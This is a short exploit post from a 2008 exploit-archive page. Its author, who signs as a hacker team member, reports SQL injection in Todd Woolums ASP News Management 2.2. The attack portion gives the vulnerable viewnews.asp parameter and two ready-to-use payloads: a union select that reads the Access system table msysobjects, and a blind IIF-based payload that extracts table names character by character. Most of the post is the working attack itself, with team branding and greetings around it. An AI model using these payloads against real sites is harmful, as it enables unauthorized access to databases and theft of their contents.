[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Todd Woolums ASP News Management 2.2 SQL Injection Vulnerabiltiy
# Published : 2008-06-10
# Author : Bl@ckbe@rD
# Previous Title : ASP Download 1.03 Arbitrary Change Administrator Account Vulnerability
# Next Title : TNT Forum 0.9.4 Local File Inclusion Vulnerabilities
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' __ /'__` / __ /'__` / ___ |
| /_, ___ /_/_L ___ ,_/ / _ __ __/ |
| /_/ /' _ ` / /_/__<_ /'___ / /`'__ ___`` |
| / / / L / __/ _ _ / / L |
| _ _ __ ____/ ____\ __\ ____/ _ ____/ |
| /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ /___/ |
| ____/ >> Kings of injection |
| /___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
[+] Script Name : AspNews Remote SQL Injection Exploit
|+| Team : InjEct0r5
[+] Author : Bl@ckbe@rD ('Tunisian TerrorisT') ;
[+] Contact : blackbeard-sql[A.T]hotmail{.}fr ;
--//-->
[+] Expl0iT :
/aspnews/viewnews.asp?newsID={SQL}
{SQL} --> 8+union+select+name+from+msysobjects
Or blind it :
{SQL} --> IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'Bingo')%00
--//-->
[+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew...
# www.Syue.com [2008-06-10]